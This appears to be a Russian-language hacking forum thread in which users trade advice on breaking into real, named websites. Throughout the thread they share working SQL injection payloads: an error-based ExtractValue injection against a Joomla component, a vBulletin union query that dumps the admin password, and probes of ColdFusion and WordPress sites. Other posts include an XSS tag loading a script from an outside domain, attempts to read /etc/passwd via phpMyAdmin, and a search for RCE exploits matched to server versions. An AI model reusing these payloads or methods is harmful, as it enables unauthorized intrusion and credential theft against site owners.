А вы что то реальное понять можете? если нет, идите свой уровень образования поднимайте, читая статьи и мануалы! _ttp://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20concat_ws(0x3a,0x3a,user(),database(),version()))))+--+ Ответ: я вам показал вектор атаки, а вы крутите его уже сами! Начните свой уровень изучив хотябы вот это: https://forum.antichat.ru/threads/43966/ А потом задавайте свои детские вопросы, показывая свою нелепую важность... P.S: Модеры, кто его выпустил из песочницы?
Да читал, иногда нужно спросить и убедиться. Вот только на мои детские вопросы вы конкретно так и не ответили! P.s. модерам спасибо, все мы когда-то были новички...
Извиняюсь за вопросы, гуглил, но как-то выдача не удалась... 1)Есть ли какие-то недавние рабочие RCE под такие сервисы??? nginx 1.6.2 Microsoft IIS 6.0 ASP.NET 1.1.4322 ASP.NET 2.0.50727 2)И ещё один вопрос: зависят ли как-то версии компонентов Joomla от основной версии самой Joomla ??? Существуют ли какие-то удобные, к примеру, таблицы, где чётко сопоставляются версия компонента с версией самой CMS ??? Или компоненты обновляются только с версией CMS ? Просто чтобы раскручивать сайт, узнал версию джумлы и её установленные дополнения, вот и думаю, по какой версии подбирать эксплоит... P.S. Чтобы не создавать нового сообщения, спрошу здесь же: ))) Joomla 2.5.7 Component: com_content Component: com_jce Component: com_jdownloads Component: com_newsfeeds Component: com_users Component: com_xmap Есть ли смысл и варианты ???
Простите, а какой у Вас был вопрос? Направьте в нужное русло? Так Вас направили. Вам предоставили вектор атаки, дальше все по "фабуле".
По первому вопросу - топаем на exploit-db и узнаем все через поиск, по второму вопросу, да, версия компонентов зависит от версии джумлы, кстати, com_jdownloads и com_xmap компоненты сторонние, в com_xmap дыр нет.
да, реально. https://rdot.org/forum/showthread.php?t=60 нужен домен из трех символов. <script src=//lol.ru></script>
В общем такой вопрос взламываю способом Spoiler: Скрипт securitytoken=guest&humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /* В ошибке должен выходить pass (без соли на это другой скрипт) Но выходит такая годня почему ? Даже если соль хочу вывести всё ровно такая хрень и это не единственный сайт где такие траблы vBulletin
profishell, поискал на великом exploit-db: 1.По nginx есть сплоиты, но версия раньше, чем 1.6.2 (Максимум, что там есть - 1.4.0) 2.Microsoft IIS 6.0 - целая пачка, но из них несколько DoS'ов , другие какие-то старые... 3.По ASP.NET тоже половину старые, что есть нормального, то или DoS, или Padding Oracle. По Jooml'е спасибо, буду знать. Но есть ли дыры в других компонентах, нежели com_jdownloads или com_xmap??? Я где-то видел, что com_users можно раскрутить, да и компонент распространённый. Com_newsfeeds тоже довольно интересный
Ребят, кто работал по coldfusion, что-нибудь можно сделать? Какие-то нестандартные sql версии. Ну, то есть, не MSSQL/MySQL/Oracle(?) Подскажите действия... К примеру: Code: http://borsariimages.com/archive/public/AssetDetail.cfm?aid=S-AAS-414-PB&lid=1%27&rdir=lightboxes&rpage=ViewLightboxContents&orig=p Code: http://178.63.177.70/huber/huber/images/showPicture.cfm?imgNo=77447141%27&language=1
Всем привет. Давно я вам тут глупых вопросов не задавал, надо наверстать. Сложилась такая штуковина есть доступ к myadmin с правами рута, всё как надо, но вот засада , нету пути, phpinfo и при выполнение команды selecl load_file('etc/passwd'); отдаётся хрень. Есть Но не НАЛ. фото Spoiler Ну да вопросы, как найти путь? Как заставить читать файлы. Мысли только подключатся с консоли и пробовать разные варианты, брут в ручную с путями var/www/site var/www/public_html/site/... может есть что-то универсальное
Еще один способ ( я описывал) Если сервер на фряхе, то при запрсое select load file('/') , то показывает все папки в корне и так далее.
Народ, кто Metasploit юзает, как задать пейлоад для выполнение кастомного php-кода, а не реверс коннект?
Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (www.securityfocus.com/bid/28894/exploit), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным) WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1] SELECT * FROM wp_spreadsheet WHERE id='1'"' WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist] INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES (' ', 'New', 'Blank spreadsheet'); WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1] SELECT * FROM wp_spreadsheet WHERE id = 1'"; В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?
в смысле префикс? table в скрипте жестко прописан. вопрос в том - возможно ли часть SQL операции отменить при ее атомарности.
может кто обьяснить почему получается достать версию бд, а имя бд, пользователя, и вообще выполнить какой то запрос не получается. ?ref=258'and+extractvalue(rand(),concat(0x3a,version(),0x3a,1))+and+' выводит CDbCommand не удалоÑÑŒ иÑполнить SQL-запроÑ: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':5.5.45-cll-lve:1' когда вместо version() написать database() или user() или select email from users limit 1 то просто показывает домашнюю страницу. ели попробовать сделать запрос к какой то несуществующей таблице select email from sdfsdfsdf limit 1, то вот такая ошибка CDbCommand не удалоÑÑŒ иÑполнить SQL-запроÑ: SQLSTATE[42S02]: Base table or view not found: 1146 Table 'ourmudss_om.vdfgdgd' doesn't exist